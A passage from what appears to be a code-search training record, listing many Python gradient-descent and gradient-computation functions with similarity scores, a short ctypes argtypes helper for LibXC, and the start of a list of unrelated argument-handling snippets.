\r\n prog_input = prog_input_gen(batch_X[k,:])\r\n \r\n # Caclulate gradient for each theta_j\r\n for j in range(n_theta):\r\n \r\n # Gradient +/- \r\n for sign in [1,-1]:\r\n grad_sign = np.zeros(n_operators)\r\n grad_progs = prog_output_grad(theta, j, sign)\r\n # Generally, the gradient programs could return\r\n # a program or list of programs (in case the \r\n # gradient +/- is the sum of expectations)\r\n if not isinstance(grad_progs, list):\r\n grad_progs = [grad_progs]\r\n for grad_prog in grad_progs:\r\n prog = prog_input\r\n prog += grad_prog\r\n # B_j +/- expectation\r\n grad_sign += np.array(qvm.expectation(prog, operator_programs))\r\n # Gradient = (B_j+ - B_j-) / 2\r\n grad[k, :, j] += sign / 2.0 * grad_sign\r\n \r\n # Gradient update\r\n grad_full = self._compute_grad_full(batch_y, batch_y_pred, grad)\r\n if self.loss == self.loss_mse:\r\n grad_full_coeff = -2.0 * np.mean((batch_y - batch_y_pred) * batch_y_pred)\r\n \r\n # Update theta\r\n theta -= self.learning_rate * grad_full\r\n if self.loss == self.loss_mse:\r\n coeff -= self.learning_rate * grad_full_coeff\r\n \r\n # Append to history\r\n history_loss.append(loss_value)\r\n history_theta.append(theta)\r\n history_grad.append(grad)\r\n \r\n # Prepare results\r\n results = OptResults()\r\n results.theta, results.coeff = theta, coeff\r\n results.loss = loss_value\r\n results.history_loss = history_loss\r\n results.history_theta = history_theta\r\n results.history_grad = history_grad\r\n \r\n return results", "def fit(self, w):\n w_former = w\n w_next = w\n w_t = w\n w_t_100 = w\n w_diff = 10000\n i = 0\n #tim_beg = t.time()\n # use two part to calculate the a(w,w0):calculate the gradient using regular or SDG, batch = 10\n # calculate the gradient and update the w,w0\n while i < 10000 and np.abs(w_diff) > 0.00001:\n loss_func = self.lost\n grads = self.gradient(loss_func)\n # calculate the y_pred(eta)\n w_next = w_former - grads(w_former) / (10000)\n k =self.lost(w_next) - self.lost(w_former)\n m = np.dot(w_next-w_former, grads(w_former).T)\n if i != 0 and i % 100 == 0:\n w_t = w_t_100\n w_t_100 = w_next\n w_diff = 1 / len(w) * (np.sum(np.abs(w_t_100 - w_t)))\n i_loss = self.lost(w_next)\n print(\"Iteration < %d > with loss < %f >\" % (i, i_loss))\n #self.los_plt.append(i_loss)\n #tim = t.time() - tim_beg\n #self.tim.append(tim)\n i += 1\n w_former = w_next\n #plt.plot(self.tim, self.los_plt)\n #plt.xlabel(\"time\")\n #plt.ylabel('loss')\n #plt.show()\n if i >= 10000:\n print(\"~Optimization stops because finishing iteration~\")\n if np.abs(w_diff) <= 0.00001:\n print(\"~Optimization stops because of difference between weights are less than 0.00001~\")\n self.w_result = w_next", "def stochasticGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta) \n for i in range(m):\n # alpha = 4.0 / (1.0 + i) + 0.01 \n loss = hypothesis[i] - y[i]\n # gradient = np.dot(x[i],loss)\n gradient = x[i,:].transpose() * loss \n theta = theta - alpha * gradient\n cost = np.sum((hypothesis-y)**2)/(2*m)\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(features, values, theta, alpha, num_iterations):\n m = len(values)\n cost_history = []\n\n for i in range(num_iterations):\n predicted_values = np.dot(features, theta)\n delta = alpha / m * np.dot((predicted_values - values), features)\n theta = theta - delta\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n return theta, pandas.Series(cost_history)", "def gradientDescentMulti(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n theta, J_history = gradientDescent(X, y, theta, alpha, num_iters)\n return theta, J_history", "def grad_reglog(w, X, y, **kwargs):\n p = np.exp(-y * (np.dot(X, w)))\n P = p / (1. + p)\n return -1 * np.dot(X.T, P * y) / X.shape[0]", "def compute_sgd_gradient(self, x_j, t_j):\n a = np.dot(x_j.T, self.w)\n return -1 * t_j * (1 / (1 + np.exp(a * t_j))) * x_j", "def grad(self, A, b, w):\n tmp = np.zeros(w.shape)\n kappa = 0.5\n wk = w\n if self.glm == 'Gaussian':\n Xwmy = np.dot(A, w) - b\n tmp = np.dot(Xwmy, A)\n elif self.glm == 'Poisson':\n xb = np.maximum(np.minimum(np.dot(A, w), 200), -200) #avoid overflow\n tmp = -np.dot(A.T, b - np.exp(xb))\n elif self.glm == 'Gamma':\n tmp = kappa * np.dot(A.T, np.reciprocal(np.dot(A, wk.T) - b))\n elif self.glm == 'Binomial':\n Xbeta = np.dot(A, w)\n pi = scipy.special.expit(Xbeta)\n #pi = np.reciprocal(1.0 + np.exp(-Xbeta))\n tmp = -np.dot(A.T, (b.flatten() - pi.flatten()))\n if self.mean:\n tmp *= 1.0 / float(A.shape[0])\n return tmp", "def least_squares_GD(y, tx, initial_w, max_iters, gamma):\n # Define parameters to store w and loss\n w = initial_w\n for n_iter in range(max_iters):\n # compute gradient\n grad = compute_gradient(y, tx, w)\n # gradient w by descent update\n if n_iter % (max_iters//10) == 0:\n print(compute_cost(y, tx, w))\n w -= gamma * grad\n\n return w, compute_cost(y, tx, w)", "def gradient(self, X, V, W, Y):\n one, d_plus_one = X.shape\n K, H_plus_one = W.shape\n d = d_plus_one - 1\n H = H_plus_one - 1\n\n Z, Yhat = self.forward(X, V, W)\n assert one == 1\n x = X\n y = Y\n z = Z.ravel()\n yhat = Yhat.ravel()\n\n # Update W\n # grad__L__yhat = (yhat - y) / np.clip(yhat * (1 - yhat), EPSILON, inf)\n # grad__L__z[:] = 0.0\n # for k in range(K):\n # grad__yhat_k__W_k = z * yhat[k] * (1 - yhat[k])\n # # Last element corresponds to constant offset 1 appended to z\n # # vector; it does not change / has no derivative.\n # grad__yhat_k__z = W[k, :-1] * yhat[k] * (1 - yhat[k])\n # grad__L__z += grad__L__yhat[k] * grad__yhat_k__z\n # W[k, :] -= self.learning_rate * grad__L__yhat[k] * grad__yhat_k__W_k\n grad__L__z = (W.T * (yhat - y)).sum(axis=1)\n zz = z.reshape((1, H + 1)).repeat(K, 0)\n grad__L__W = diag(yhat - y) @ zz\n\n # Update V\n # for h in range(H):\n # grad__z_h__V_h = x * (1 - z[h] ** 2)\n # grad__L__V_h = grad__L__z[h] * grad__z_h__V_h\n # V[h, :] -= self.learning_rate * grad__L__V_h\n xx = x.reshape((1, d + 1)).repeat(H + 1, 0)\n grad__L__V = diag((1 - z ** 2) * grad__L__z) @ xx\n\n return grad__L__V, grad__L__W", "def gradient_descent(\n self,\n coeffs, \n x_values, y_values):\n old_loss = self.old_loss\n mse = self.loss\n\n for i in range(self.steps):\n new_loss = self.loss_mse(coeffs, x_values, y_values)\n mse = np.append(mse, new_loss)\n if abs(new_loss - old_loss) <= self.early_stop:\n print(f\"Early cut off, difference of losses between steps is less that {self.early_stop}.\")\n break\n old_loss = new_loss\n\n coeffs = coeffs - (self.learning_rate)*self.gradient_calculation(coeffs, x_values, y_values)\n\n mse = np.append(mse, self.loss_mse(coeffs, x_values, y_values))\n self.coefficients = coeffs\n self.loss = mse", "def gradient_descent(X, y, theta, learning_rate, num_iters, lambda_reg):\n thetas = [theta]\n cost = np.zeros(num_iters)\n\n J = mean_cross_entropy_costs(X, y, lambda_reg)\n cost[0] = J(thetas[0])\n for i in range(1, num_iters):\n thetas.append(compute_new_theta(X, y, thetas[i - 1], learning_rate, lambda_reg))\n cost[i] = J(thetas[i])\n return cost, thetas", "def backward(self, i):\n \n #Compute gradient for w1, w2, w3\n w1_grad = np.zeros((2, 3))\n w2_grad = np.zeros((3, 3))\n w3_grad = np.zeros((3, 1))\n \n \n w3_backward_pass = np.zeros((1, 1))\n w2_backward_pass = np.zeros((1, 3))\n \n #print(\"self.error shape\",self.error.shape)\n #Compute w3 gradient\n for i, w in enumerate(w3_grad): # 3 x 1 \n w3_forward_pass = self.a2[0][i]\n w3_backward_pass = self.error * der_sigmoid(self.y)\n w3_grad[i] = w3_forward_pass * w3_backward_pass\n \n #Compute w2 gradient\n for i, w_row in enumerate(w2_grad): # 3 x 3 \n for j, w in enumerate(w2_grad[i]):# 1 x 3 \n w2_forward_pass = self.a1[0][i]\n w2_backward_pass[0][i] = der_sigmoid(self.a2[0][i]) * self.w3[i][0] * w3_backward_pass\n w2_grad[i][j] = w2_forward_pass * w2_backward_pass[0][i]\n \n \n #Compute w1 gradient \n for i, w_rol in enumerate(w1_grad): # 2 x 3\n for j, w in enumerate(w1_grad[i]): # 1 x 3\n w1_forward_pass = self.input[0][i]\n w1_backward_pass = der_sigmoid(self.a1[0][i]) * self.w2[i][j] * w2_backward_pass[0][i]\n w1_grad[i][j] = w1_forward_pass * w1_backward_pass\n \n \n #Update \n for i, w in enumerate(w3_grad): \n self.w3[i] -= self.learning_rate * w3_grad[i]\n \n for i, w_row in enumerate(w2_grad): # 3 x 3 \n for j, w in enumerate(w2_grad[i]):# 1 x 3 \n self.w2[i][j] -= self.learning_rate * w2_grad[i][j]\n \n for i, w_rol in enumerate(w1_grad): # 2 x 3\n for j, w in enumerate(w1_grad[i]): # 1 x 3\n self.w1[i][j] -= self.learning_rate * w1_grad[i][j]\n \n #print(\"w3 grad : \", w3_grad)\n #print(\"w3.shape :\", self.w3.shape)", "def batchGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n xTran = x.transpose()\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta)\n loss = hypothesis - y\n cost = np.sum(loss**2)/(2*m)\n gradient = np.dot(xTran,loss)/m\n theta = theta - alpha*gradient\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(X, Y, max_iter=1000, eta=0.1, mu=0.01):\n Y_onehot = onehot_encoder.fit_transform(Y.reshape(-1,1))\n W = np.zeros((X.shape[1], Y_onehot.shape[1]))\n step = 0\n step_lst = []\n loss_lst = []\n W_lst = []\n\n while step < max_iter:\n step += 1\n W -= eta * gradient(X, Y_onehot, W, mu)\n step_lst.append(step)\n W_lst.append(W)\n loss_lst.append(loss(X, Y_onehot, W))\n\n df = pd.DataFrame({\n 'step': step_lst,\n 'loss': loss_lst\n })\n return df, W", "def stochastic_gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad,\n batch_size=1, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter, (minibatch_y, minibatch_tx) in \\\n enumerate(batch_iter(y, tx, batch_size, num_batches=max_iters)):\n \n grad = compute_loss(minibatch_y, minibatch_tx, w)\n loss = compute_grad(minibatch_y, minibatch_tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Stochastic Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n\n return w, loss", "def gradient_function(theta, X, y):\n\n grad = None\n #######################################################################\n # TODO: #\n # Compute the gradient for a particular choice of theta. #\n # Compute the partial derivatives and set grad to the partial #\n # derivatives of the cost w.r.t. each parameter in theta #\n # #\n #######################################################################\n \n theta = theta[:, np.newaxis]\n \n thetatrans = theta.T\n Xtrans = X.T\n \n MulThetaX = np.dot(thetatrans, Xtrans)\n \n h = sigmoid(MulThetaX)\n \n grad = (y - h) * Xtrans\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n return grad", "def gradientFunctionReg(theta, X, y, Lambda):\n m = len(y) # number of training examples\n grad = np.zeros(theta.shape[0])\n theta = np.transpose(theta)\n sum_1 = 0\n X = X.values\n y = y.values\n #calcuate the theta_0 \n# ====================== YOUR CODE HERE ======================\n# Instructions: Compute the gradient of a particular choice of theta.\n# Compute the partial derivatives and set grad to the partial\n# derivatives of the cost w.r.t. each parameter in theta\n for i in range(theta.shape[0]):\n if i == 0:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i]\n else:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i] + Lambda*theta[i]\n grad[i] = sum_1/m\n sum_1 = 0\n\n# =============================================================\n\n return grad", "def amended_gradient(self, dw, trn_X, trn_y, epsilon: float = 0.01, amend: float = 0.1):\n norm = torch.cat([w.view(-1) for w in dw]).norm()\n eps = epsilon / norm\n\n dw_pos = self.finite_difference(dw, trn_X, trn_y, eps, wrt='weights')\n dw_neg = self.finite_difference(dw, trn_X, trn_y, -eps, wrt='weights')\n dalpha_pos = self.finite_difference([(wp - wn) / 2 for wp, wn in zip(dw_pos, dw_neg)], trn_X, trn_y, 1, wrt='alpha')\n dalpha_neg = self.finite_difference([(wp - wn) / 2 for wp, wn in zip(dw_pos, dw_neg)], trn_X, trn_y, -1, wrt='alpha')\n hessian = [-amend * (p - n) / (2. * eps) for p, n in zip(dalpha_pos, dalpha_neg)]\n return hessian", "def evaluate(self, w, X, y):\n # help avoid mistakes (as described in the assignment) by\n # potentially reshaping our arguments\n w = ensure_1d(w)\n y = ensure_1d(y)\n\n # Prediction is linear combination\n y_hat = X @ w\n # Residual is difference between ground truth and prediction\n # (\"what's left\" after your predicition)\n residuals = y - y_hat\n # Squared residuals gives us the objective function value\n f = 0.5 * np.sum(residuals ** 2)\n\n # Analytical gradient, written in mathematical form first\n # and then translated into Python.\n # The parentheses on the first term are just a small optimization:\n # this way, we do two matrix-vector multipliciations,\n # instead of a (more expensive) matrix-matrix mult and a matrix-vector\n g = X.T @ (X @ w) - X.T @ y\n return f, g", "def logistic_regression_gradient_descent(y, tx, initial_w, max_iters, gamma):\n\tw = initial_w\n\n\tfor iter in range(max_iters):\n\t\tw = learning_by_gradient_descent(y, tx, w, gamma)\n\n\treturn w", "def least_squares_GD(y, tx, initial_w, max_iters, gamma):\n w_start = initial_w\n w = w_start\n\n for n_iter in range(max_iters):\n gradient = compute_gradient(y, tx, w)\n loss = compute_loss(y,tx,w)\n w = w - gamma * gradient\n\n return w, loss", "def test_gradient_step(var_f, len_f, var_y, N):\n\n x, y = build_data(N)\n\n gp_model = initialise_gp_model(var_f, len_f, var_y, x, y)\n markovgp_model = initialise_markovgp_model(var_f, len_f, var_y, x, y)\n\n gv = objax.GradValues(gp_model.energy, gp_model.vars())\n gv_markov = objax.GradValues(markovgp_model.energy, markovgp_model.vars())\n\n lr_adam = 0.1\n lr_newton = 1.\n opt = objax.optimizer.Adam(gp_model.vars())\n opt_markov = objax.optimizer.Adam(markovgp_model.vars())\n\n gp_model.update_posterior()\n gp_grads, gp_value = gv()\n gp_loss_ = gp_value[0]\n opt(lr_adam, gp_grads)\n gp_hypers = np.array([gp_model.kernel.lengthscale, gp_model.kernel.variance, gp_model.likelihood.variance])\n print(gp_hypers)\n print(gp_grads)\n\n markovgp_model.update_posterior()\n markovgp_grads, markovgp_value = gv_markov()\n markovgp_loss_ = markovgp_value[0]\n opt_markov(lr_adam, markovgp_grads)\n markovgp_hypers = np.array([markovgp_model.kernel.lengthscale, markovgp_model.kernel.variance,\n markovgp_model.likelihood.variance])\n print(markovgp_hypers)\n print(markovgp_grads)\n\n np.testing.assert_allclose(gp_grads[0], markovgp_grads[0], rtol=1e-4)\n np.testing.assert_allclose(gp_grads[1], markovgp_grads[1], rtol=1e-4)\n np.testing.assert_allclose(gp_grads[2], markovgp_grads[2], rtol=1e-4)", "def compute_gradient (w, x, y):\n (n,d) = x.shape\n g = np.zeros(d)\n for i in range(0,d):\n g[i] = (w*x-y)*np.transpose(x[i])\n g += 0.5*w\n return g", "def approx_grad(theta, X, y):\n grad_a = np.array([(cost(theta + e, X, y) - cost(theta - e, X, y)) / (2 * 1e-5)\n for e in np.identity(len(theta)) * 1e-5])\n return grad_a", "def gradientDescent (trainingFaces, trainingLabels, cost, gradient, w, learning_rate, tolerance, freq, alpha = 0.):\n\n # Initialize starting values\n lastJ = np.inf\n currentJ = cost(w, trainingFaces, trainingLabels, alpha) \n delta = lastJ - currentJ\n num_iter = 1\n \n while (delta > tolerance):\n \n # Problem 2 runs for ~80 iterations\n # Problem 3 runs for ~19000 iterations\n # This allows us to show every iteration for Problem 2,\n # while only showing every 100 iterations for Problem 3\n if (not (num_iter % freq)):\n print(\"%4d: J = %10f\\t||w|| = %5f\\tDelta = %5f\" % ((num_iter, currentJ, np.linalg.norm(w), delta)))\n \n # Update values\n lastJ = currentJ\n w = w - ( learning_rate * gradient(w, trainingFaces, trainingLabels) )\n currentJ = cost(w, trainingFaces, trainingLabels, alpha)\n delta = abs(lastJ - currentJ)\n num_iter += 1\n \n return w", "def gradient_descent(features, values, theta, alpha, num_iterations):\n \n # number of points\n npoints = len(values)\n \n # intialize cost history\n cost_history = []\n \n # num_interations iterations\n for iiter in range(num_iterations):\n \n # compute and store cost\n cost = compute_cost(features, values, theta)\n cost_history.append(cost)\n \n # update values of theta\n values_predicted = np.dot(features, theta)\n theta = theta + (alpha/npoints)*(np.dot(values - values_predicted,features))\n \n return theta, pandas.Series(cost_history)", "def least_squares_GD(y, tx, initial_w, max_iters, gamma, loss_function=mse, gradient=mse_grad):\n w = initial_w\n for iter in range(max_iters):\n # compute gradient\n grad = gradient(y, tx, w)\n # update w\n w = w - gamma * grad\n loss = loss_function(y, tx, w)\n return w, loss", "def Perceptron(i, x_batch, y_batch, w):\n \n for j in tqdm(xrange(x_batch.shape[0])):\n # y * w^{T} * x\n if y_batch[j] * w.multiply(x_batch[j]).sum() < 0:\n # w^{t+1} = w^{t} + y * x\n w += y_batch[j] * x_batch[j]\n return w, None", "def fgrad_y(self,y,psi):\r\n raise NotImplementedError", "def grad(self, A, b, w):\n tmp = np.zeros(w.shape)\n kappa = 0.5\n\n wk = w\n if self.glm == 'Gaussian':\n Xwmy = np.dot(A, w) - b\n tmp = np.dot(Xwmy, A)\n elif self.glm == 'Poisson':\n xb = np.maximum(np.minimum(np.dot(A, w), 200), -200) #avoid overflow\n tmp = -np.dot(A.T, b - np.exp(xb))\n elif self.glm == 'Gamma':\n tmp = kappa * np.dot(A.T, np.reciprocal(np.dot(A, wk.T) - b))\n elif self.glm == 'Binomial':\n Xbeta = np.dot(A, w)\n pi = np.reciprocal(1.0 + np.exp(-Xbeta))\n tmp = -np.dot(A.T, (b.flatten() - pi.flatten()))\n if self.mean:\n tmp *= 1.0 / float(A.shape[0])\n return tmp", "def gradient_descent(X, y, theta, alpha, total_iterations, hypothesis):\n len_theta = len(theta)\n m = len(y)\n one_over_m = (1.0 / float(m))\n\n for _ in range(0, total_iterations):\n temp_theta = numpy.zeros(len_theta)\n\n X_by_theta_minus_y = numpy.subtract(hypothesis(numpy.matrix(theta), X), y)\n\n for j in range(0, len_theta):\n jth_column_of_X = X[:,j]\n derivative_j = one_over_m * numpy.multiply(X_by_theta_minus_y, jth_column_of_X).sum()\n temp_theta[j] = theta[j] - alpha*derivative_j\n\n theta = temp_theta\n\n return numpy.matrix(theta)", "def _learn_using_GD(self, y, tx, w, fn, gamma, lambda_, regularization):\n loss, grad = fn(y, tx, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def least_squares_gradient(y, tx, w): \n e = y - tx.dot(w)\n grad = -tx.T.dot(e) / len(e)\n return grad, e", "def GradientDescent(X, Y, alpha, iterations):\n\n\tn = X.shape[0]\n\tbeta = np.zeros((X.shape[1],1))\n\n\tfor i in range(1,iterations):\n\t\tbeta = beta - alpha*np.dot(np.transpose(X), np.dot(X, beta) - Y)/float(n)\n\t\t# risk = ((np.dot(X, beta) - Y)**2)/(2*float(n))\n\n\treturn beta", "def compute_gradient(X, t, w): # TODO: try to change to square loss since it's hessian is easier to obtain\n # TODO : print to console the max gradient in every run\n A = np.dot(X, w)\n m = t.shape[0]\n C = -1 * t * (1 / (1 + np.exp(A * t)))\n return (1 / m) * np.dot(X.T, C)", "def gradientFunctionReg(theta, X, y, Lambda): \n y = np.squeeze(y)\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad[1:] = grad[1:] + Lambda*theta[1:]\n grad /= m\n\n return grad", "def compute_gradient(self): # TODO: try to change to square loss since it's hessian is easier to obtain\n A = np.dot(self.X, self.w)\n m = self.t.shape[0]\n C = -1 * self.t * (1 / (1 + np.exp(A * self.t)))\n return (1 / m) * np.dot(self.X.T, C)", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def compute_gradient(Y, mi, latent_Sigmas, B1, B2, ss, mu, g1, g2, sigma2, index):\n\n # these are the 's' parameters when nu=e_q, beta=0\n si = -mi[-1]*ss[index][-1]\n Sigma = latent_Sigmas[index]\n yi = Y[index]\n\n B1_plus_B2 = B1 + B2\n\n b0 = -mi.reshape(-1, 1) + 1/(2*sigma2)*np.matmul(B1_plus_B2.T, (yi-mu).T)\n\n b1 = (SQRT_PI_OVER_2-1-si**2)*np.exp(-si**2/2)*g1*np.trace(\n np.matmul(\n np.matmul(\n B1.T, B1\n ),\n Sigma\n )\n )\n\n b2 = si*np.exp(-si**2/2)*g2*np.trace(\n np.matmul(\n np.matmul(\n B2.T,\n B2\n ),\n Sigma\n )\n )\n\n B1TB1 = np.matmul(B1.T, B1)\n B2TB2 = np.matmul(B2.T, B2)\n\n b3 = np.exp(-si**2/2)*np.matmul(\n mi.T,\n np.matmul(\n B2TB2 - B1TB1,\n mi\n )\n )\n\n b4 = ROOT2PI*np.matmul(\n mi,\n erfc(si/ROOT2)*B1TB1 + (erf(si/ROOT2)+1)*B2TB2\n ).reshape(-1, 1)\n\n # qth_terms = [-var[-1]*eq*(item1 + item2 + item3) for var, item1, item2, item3 in zip(latent_variances, b1, b2, b3)]\n\n # return sum([outer_term + (TWOPI)**(1/2-q)/(2*sigma2)*inner_term for outer_term, inner_term in zip(b0, inner_terms)])\n\n result = b0 + b4\n\n # update the qth element with the corresponding derivative elements\n result[-1] += (TWOPI)**(1/2-q)/(2*sigma2)*(b1 + b2 + b3)\n\n return result.flatten()", "def add_grad_updates(self):\n \n gradients = T.grad(self.cost, self.theta)\n \n for target_param, grad in zip(self.theta, gradients):\n \n if target_param.name ==\"W\" and self.num_hidden ==0\\\n and self.zero_diag:\n \n grad = grad - T.diag(T.diag(grad)) # no x i - xi connections\n # for all i = 1, ..., D\n ##############################################################\n if target_param.name ==\"b\" and self.learn_biases == False:\n print(\"Will not learn bias terms\")\n pass\n \n elif target_param.name ==\"bhid\" and self.learn_biases == False:\n print(\"Will not learn bias terms\")\n pass\n \n else:\n \n if self.use_momentum:\n \n # alternative definition (mostly seen):\n #g_tilda = self.momentum*self.grad_vec[target_param.name] - \\\n #T.cast(self.learning_rate, dtype = theano.config.floatX)*grad\n #self.updates[target_param] = target_param + g_tilda\n \n g_tilda = self.momentum*self.grad_vec[target_param.name] - \\\n (1-self.momentum)*grad\n \n self.updates[target_param] = target_param +\\\n T.cast(self.learning_rate, dtype = theano.config.floatX)*g_tilda\n \n # store g_tilda for next iteration:\n self.updates[self.grad_vec[target_param.name]] = g_tilda\n \n else:\n \n self.updates[target_param] = target_param -\\\n T.cast(self.learning_rate, dtype = theano.config.floatX)*grad\n \n if (\"PCD\" in self.algorithm) and self.num_hidden > 0:\n \n self.updates[self.persistent_gibbs] = self.hid_samples", "def grad(self, w):\n l1_grad = self.r * np.sign(w)\n l2_grad = np.asarray(1 - self.r) * w \n\n gradient_penalty = self.alpha * (l1_grad + l2_grad)\n\n # Insert 0 for bias term.\n return np.insert(gradient_penalty, 0, 0, axis=0)", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def grad(self, K, y, ak):\n Ka = K.dot(ak) # precompute\n z = y * Ka # decision value for each observation\n grad = (-1*K[z < 1].T.dot(y[z < 1])) / y.size # gradient of hinge\n l2 = (2 * self.lambda_ * Ka) # gradient of l2\n # Don't regularize offset dimension\n grad[:self.offset(ak)] = grad[:self.offset(ak)] + l2[:self.offset(ak)]\n # Gradient normalized by the num obs\n return grad", "def calc_grad(X, Y, theta):\n m, n = X.shape\n\n margins = Y * X.dot(theta)\n probs = 1. / (1 + np.exp(margins))\n grad = -(1./m) * (X.T.dot(probs * Y))\n\n return grad", "def gradient_descent(g_dd, y_train, loss, g_td=None):\n\n output_dimension = y_train.shape[-1]\n\n g_dd = empirical.flatten_features(g_dd)\n\n def fl(fx):\n \"\"\"Flatten outputs.\"\"\"\n return np.reshape(fx, (-1,))\n\n def ufl(fx):\n \"\"\"Unflatten outputs.\"\"\"\n return np.reshape(fx, (-1, output_dimension))\n\n # These functions are used inside the integrator only if the kernel is\n # diagonal over the logits.\n ifl = lambda x: x\n iufl = lambda x: x\n\n # Check to see whether the kernel has a logit dimension.\n if y_train.size > g_dd.shape[-1]:\n out_dim, ragged = divmod(y_train.size, g_dd.shape[-1])\n if ragged or out_dim != y_train.shape[-1]:\n raise ValueError()\n ifl = fl\n iufl = ufl\n\n y_train = np.reshape(y_train, (-1))\n grad_loss = grad(functools.partial(loss, y_hat=y_train))\n\n if g_td is None:\n dfx_dt = lambda unused_t, fx: -ifl(np.dot(g_dd, iufl(grad_loss(fx))))\n\n def predict(dt, fx=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n r.set_initial_value(fl(fx), 0)\n r.integrate(dt)\n\n return ufl(r.y)\n else:\n g_td = empirical.flatten_features(g_td)\n\n def dfx_dt(unused_t, fx, train_size):\n fx_train = fx[:train_size]\n dfx_train = -ifl(np.dot(g_dd, iufl(grad_loss(fx_train))))\n dfx_test = -ifl(np.dot(g_td, iufl(grad_loss(fx_train))))\n return np.concatenate((dfx_train, dfx_test), axis=0)\n\n def predict(dt, fx_train=0., fx_test=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n\n fx = fl(np.concatenate((fx_train, fx_test), axis=0))\n train_size, output_dim = fx_train.shape\n r.set_initial_value(fx, 0).set_f_params(train_size * output_dim)\n r.integrate(dt)\n fx = ufl(r.y)\n\n return fx[:train_size], fx[train_size:]\n\n return predict" ]
[ "0.7216477", "0.71876305", "0.71149236", "0.7052852", "0.7013499", "0.69575596", "0.69293684", "0.68894744", "0.6888488", "0.688774", "0.6869979", "0.68588704", "0.6835098", "0.6807218", "0.6702064", "0.66813123", "0.66674036", "0.65884393", "0.6562325", "0.6562148", "0.6537826", "0.6526787", "0.6515124", "0.65035146", "0.6500977", "0.6492697", "0.6487275", "0.6484871", "0.64803183", "0.64718294", "0.6469536", "0.64684653", "0.64640296", "0.6455923", "0.6443302", "0.6439009", "0.6437436", "0.642056", "0.6419518", "0.6414511", "0.641008", "0.64076257", "0.6379973", "0.63556844", "0.6352346", "0.6352183", "0.63509417", "0.6339519", "0.6336618", "0.63298196", "0.63240683", "0.6323299", "0.6321625", "0.63017195", "0.6300362", "0.6300137", "0.62991244", "0.6296372", "0.6271314", "0.6267025", "0.626573", "0.625344", "0.6250401", "0.62466156", "0.6243037", "0.6241598", "0.62315917", "0.6229713", "0.6219098", "0.62183934", "0.6217658", "0.6207271", "0.6195172", "0.619186", "0.61865455", "0.6184996", "0.6184693", "0.6179402", "0.61756724", "0.6173997", "0.61705595", "0.6167974", "0.61671406", "0.6163665", "0.6151914", "0.614696", "0.61430895", "0.6142707", "0.61397976", "0.61384594", "0.6136737", "0.61339134", "0.6125221", "0.6124089", "0.61230785", "0.6121949", "0.6106431", "0.61054814", "0.6103296", "0.60978055", "0.6097466" ]
0.0
-1
Small function to build the correct argtypes for the LibXC computers
def _build_comute_argtype(num_nd, num_nd_write): ret = [_xc_func_p, ctypes.c_size_t] ret += [_ndptr] * num_nd ret += [_ndptr_w] * num_nd_write return tuple(ret)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cmd_type(args):", "def _cast_types(args):\n\targs.x_val = None if args.x_val == 'None' else int(args.x_val)\n\targs.test_size = float(args.test_size)\n\targs.alpha = float(args.alpha)\n\targs.fit_prior = (args.fit_prior in ['True', \"True\", 'true', \"true\"])\n\n\t# class_prior - array like type (problem to convert)\n\tif args.class_prior == \"None\" or args.class_prior == 'None':\n\t\targs.class_prior = None\n\n\t# --------- #\n\treturn args", "def set_arg_types( self ):\n if self.mode == 'grad':\n self.function = terms.dw_grad\n use_method_with_name( self, self.get_fargs_grad, 'get_fargs' )\n elif self.mode == 'div':\n self.function = terms.dw_div\n use_method_with_name( self, self.get_fargs_div, 'get_fargs' )\n else:\n self.function = self.d_eval\n use_method_with_name( self, self.get_fargs_eval, 'get_fargs' )\n self.use_caches = {'state_in_volume_qp' : [['parameter_s']],\n 'div_vector' : [['parameter_v']]}", "def determine_arg_locations(self, arg_types): # pragma: no cover\n raise NotImplementedError(\"Implement this\")", "def processCmdLineArgs(expectedTypes, usage):\n\targs = []\n\tnumComLineArgs = len(sys.argv)\n\tnumExpected 